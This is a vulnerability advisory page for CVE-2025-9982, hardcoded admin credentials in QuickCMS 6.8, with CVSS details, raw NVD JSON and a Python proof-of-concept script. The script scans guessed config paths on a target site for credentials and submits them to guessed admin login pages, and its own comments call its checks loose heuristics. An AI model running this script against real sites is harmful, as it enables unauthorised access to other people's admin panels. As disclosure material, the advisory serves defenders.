Security Vulnerability Report
CVE-2025-9982 CVSS 7.5 HIGH

CVE-2025-9982

Published: 2025-11-14 14:15:47
Last Modified: 2025-11-17 19:28:12

Description

A vulnerability exists in QuickCMS version 6.8 where sensitive admin credentials are hardcoded in a configuration file and stored in plaintext. This flaw allows attackers with access to the source code or the server file system to retrieve authentication details, potentially leading to privilege escalation. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE
QuickCMS 6.8 (confirmed affected)
Other QuickCMS versions (possibly affected, not tested)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
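#!/usr/bin/env python3
"""
CVE-2025-9982 PoC - QuickCMS 6.8 Hardcoded Admin Credentials

Requests a list of candidate configuration files from a QuickCMS site over
HTTP, searches each response for a username/password pair, and submits any
match to a list of candidate admin login URLs.

Review notes for anyone using this to assess their own installation:

* The advisory describes an attacker who already has access to the source
  code or the server file system. This script only issues HTTP requests. A
  web server that executes .php files normally returns their output rather
  than their source, so a negative result here does not show that an
  installation is unaffected; inspect the configuration file on disk.
* The candidate paths, the credential key names in the regular expressions
  and the login form fields are the script's own guesses. None of them is
  confirmed by the advisory text.
* The login check in try_admin_login() is a loose heuristic, so the
  "VULNERABLE" verdict printed by main() is an indication, not proof.
"""

import re
import sys

import requests

# Per-request timeout in seconds, shared by every HTTP call below.
REQUEST_TIMEOUT = 10

# Patterns for a quoted key followed by '=' or ':' and a quoted value.
# Compiled once instead of on every loop iteration.
_ADMIN_USER_RE = re.compile(
    r"['\"](?:admin_username|admin_user|username)['\"]\s*[=:]\s*['\"]([^'\"]+)['\"]"
)
_ADMIN_PASS_RE = re.compile(
    r"['\"](?:admin_password|admin_pass|password)['\"]\s*[=:]\s*['\"]([^'\"]+)['\"]"
)


def check_quickcms_version(target_url):
    """Fingerprint the target page and return its QuickCMS version string.

    Returns the version captured after "QuickCMS" in the page body, the
    string "Unknown" when the body mentions "quick" but no version number
    is found, and None when the body has no such marker or the request
    fails.

    NOTE(review): nothing in this script calls this function, so main()
    probes the target without checking that it is QuickCMS at all.
    """
    try:
        response = requests.get(target_url, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print(f"[-] Error checking version: {e}")
        return None

    # 'quickcms' contains 'quick', so a single case-insensitive test
    # covers both of the original substring checks.
    if 'quick' not in response.text.lower():
        return None

    version_match = re.search(r'QuickCMS\s*v?([\d.]+)', response.text, re.I)
    return version_match.group(1) if version_match else "Unknown"


def extract_config_file(target_url, config_paths):
    """Search the given paths for a hardcoded username/password pair.

    Each path is requested relative to target_url. The first HTTP 200
    response whose body matches both patterns ends the search.

    Returns a dict with 'username' and 'password' keys, or None when no
    path yields both values.
    """
    base_url = target_url.rstrip('/')
    for config_path in config_paths:
        url = f"{base_url}/{config_path}"
        try:
            response = requests.get(url, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as e:
            print(f"[-] Error accessing {config_path}: {e}")
            continue

        if response.status_code != 200:
            continue

        admin_user = _ADMIN_USER_RE.search(response.text)
        admin_pass = _ADMIN_PASS_RE.search(response.text)
        if admin_user and admin_pass:
            credentials = {
                'username': admin_user.group(1),
                'password': admin_pass.group(1),
            }
            print(f"[+] Found hardcoded credentials in {config_path}")
            print(f"    Username: {credentials['username']}")
            # The recovered secret is returned to the caller but kept out
            # of stdout, so it does not end up in terminal scrollback or
            # captured logs.
            print("    Password: [redacted]")
            return credentials
    return None


def try_admin_login(target_url, username, password):
    """Submit the credentials to each candidate admin URL.

    Returns True at the first URL whose response passes the heuristic
    below, otherwise False.

    NOTE(review): the heuristic accepts any 302 response, and any 200
    response whose body contains "admin" or "dashboard". A redirect back to
    the login form, or a login page that mentions "admin", satisfies it
    too, so True means the request was accepted by the heuristic, not that
    authentication was verified.
    """
    base_url = target_url.rstrip('/')
    admin_urls = [
        base_url + '/admin',
        base_url + '/admin.php',
        base_url + '/cms-admin',
    ]
    login_data = {
        'login': username,
        'password': password,
        'action': 'login',
    }

    for admin_url in admin_urls:
        try:
            response = requests.post(
                admin_url,
                data=login_data,
                timeout=REQUEST_TIMEOUT,
                allow_redirects=False,
            )
        except requests.RequestException as e:
            # Report the failure instead of silently moving on, so an
            # unreachable endpoint is not mistaken for a rejected login.
            print(f"[-] Error accessing {admin_url}: {e}")
            continue

        body = response.text.lower()
        redirected = response.status_code == 302
        looks_like_admin = response.status_code == 200 and (
            'admin' in body or 'dashboard' in body
        )
        if redirected or looks_like_admin:
            print(f"[+] Successfully logged in at {admin_url}")
            return True
    return False


def main():
    """Command-line entry point: takes the target URL as the only argument."""
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-9982-poc.py <target_url>")
        print("Example: python3 cve-2025-9982-poc.py http://target.com")
        sys.exit(1)

    target_url = sys.argv[1]
    print(f"[*] Checking target: {target_url}")

    # Common QuickCMS config file paths
    config_paths = [
        'config.php',
        'data/config.php',
        'cms/data/config.php',
        'includes/config.php',
        'admin/config.php',
    ]

    # Extract credentials
    print("[*] Searching for config files with hardcoded credentials...")
    creds = extract_config_file(target_url, config_paths)

    if not creds:
        print("[-] No hardcoded credentials found in common config paths")
        return

    print("\n[*] Attempting to login to admin panel...")
    if try_admin_login(target_url, creds['username'], creds['password']):
        print("[+] VULNERABLE: Hardcoded credentials work!")
    else:
        print("[-] Credentials found but login failed (may need different endpoint)")


if __name__ == '__main__':
    main()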

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9982", "sourceIdentifier": "[email protected]", "published": "2025-11-14T14:15:47.113", "lastModified": "2025-11-17T19:28:12.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in QuickCMS version 6.8 where sensitive admin credentials are hardcoded in a configuration file and stored in plaintext. This flaw allows attackers with access to the source code or the server file system to retrieve authentication details, potentially leading to privilege escalation.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-9982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}